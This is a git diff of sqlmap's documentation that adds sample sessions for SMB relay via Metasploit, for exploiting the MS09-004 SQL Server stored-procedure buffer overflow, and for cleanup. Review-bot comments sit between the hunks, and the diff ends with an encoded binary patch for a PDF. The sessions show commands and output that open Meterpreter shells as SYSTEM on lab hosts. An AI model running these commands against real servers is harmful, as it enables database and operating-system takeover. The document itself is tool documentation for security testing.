+[*] Connecting to the ADMIN$ share...
+[*] Regenerating the payload...
+[*] Uploading payload...
+[*] Created \wELRmcmd.exe...
+[*] Connecting to the Service Control Manager...
+[*] Obtaining a service manager handle...
+[*] Creating a new service...
+[*] Closing service handle...
+[*] Opening service...
+[*] Starting the service...
+[*] Removing the service...
+[*] Closing service handle...
+[*] Deleting \wELRmcmd.exe...
+[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3244 \
+[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
+[*] Ignoring request from 192.168.1.131, attack already in progress.
+[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
+
+Active sessions
+===============
+
+  Id  Description  Tunnel                                       
+  --  -----------  ------                                       
+  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
+
+msf exploit(smb_relay) > [*] Starting interaction with 1...
+
+meterpreter > [-] The 'priv' extension has already been loaded.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+[*] Meterpreter session 1 closed.
+msf exploit(smb_relay) > exit
+
+[*] Server stopped.
+
+
+

+

Stored procedure buffer overflow exploitation

Options: --os-bof, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system is not patched against Microsoft +Security Bulletin +MS09-004, +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on +Metasploit to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
+stored procedure heap-based buffer overflow (MS09-004)
+[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
+[hh:mm:14] [INFO] retrieved: 1
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
+[hh:mm:15] [INFO] testing if current user is DBA
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 
+which is the back-end DBMS address? [192.168.1.131] 
+which remote port numer do you want to use? [39391] 62719
+which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:50] [INFO] creation in progress .................. done
+[hh:mm:08] [INFO] handling DEP
+[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
+handle it
+[hh:mm:08] [INFO] checking DEP system policy
+[hh:mm:09] [INFO] retrieved: OPTIN
+[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
+[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > exit
+
+
+

+

5.10 Miscellaneous
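Review bot: --tmp-path is listed on the "Options:" line of the out-of-band shell section, but none of the paragraphs added in place of the TODO say what it does. The only hint is the stager path 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe' in the sample output, so add a sentence describing the option and which path is used when it is omitted. The --os-bof example is run under sudo although the root requirement is stated only for --os-smbrelay (to listen on the SMB port); either drop sudo there or document why it is needed. In the --priv-esc sample output the timestamps switch from the masked [hh:mm:ss] form to literal values ([14:10:06] through [14:11:01]); mask them like the rest. Both --os-shell examples answer "n" to removing sys_exec and sys_eval, and the --os-pwn examples upload a stager executable with no removal step shown, so the prose should state that these artifacts stay on the target and point to --cleanup. Wording: "sqlmap firstly check", "PostgreSQL run as" and "to abused Windows access tokens" need fixing.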

@@ -4216,7 +5065,7 @@ counts the number of retrieved query output characters.

It is possible to update sqlmap to the latest stable version available on its -SourceForge File List page by running it with the +SourceForge File List page by running it with the --update option.

@@ -4233,7 +5082,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4252,7 +5101,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4576,8 +5425,34 @@ vulnerable parameter which is the default behaviour.

Option: --cleanup

-

This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper -Advanced SQL injection to operating system full control for the moment.

+

It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system.

+ +

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \
+  -v 2 --cleanup
+
+[...]
+[hh:mm:18] [INFO] cleaning up the database management system
+[hh:mm:18] [DEBUG] removing support tables
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] 
+[hh:mm:20] [DEBUG] removing sys_exec UDF
+[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
+do you want to remove sys_eval UDF? [Y/n] 
+[hh:mm:21] [DEBUG] removing sys_eval UDF
+[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
+[hh:mm:21] [INFO] database management system cleanup finished
+[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
+only be deleted manually
+
+
+

6. Disclaimer
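Review bot: the new --cleanup paragraph only mentions removing sqlmap temporary tables and user-defined functions, while the sample output ends with the warning that UDF shared library files saved on the file system can only be deleted manually. State that limitation in the paragraph itself so a reader does not assume the target is left clean after --cleanup. The paragraph should also say that removal of each UDF (sys_exec, sys_eval in the sample) is confirmed through a [Y/n] prompt. The wording "done with owning the underlying operating system or file system" would read better as "done taking over the underlying operating system or accessing the file system".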

diff --git a/doc/README.pdf b/doc/README.pdf index c1ef3345fb578efd42c8bc72ce0eb8983455547a..48c798dd3d2b9931ab8e1285163cd4e55c96ee87 100644 GIT binary patch delta 167172
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 
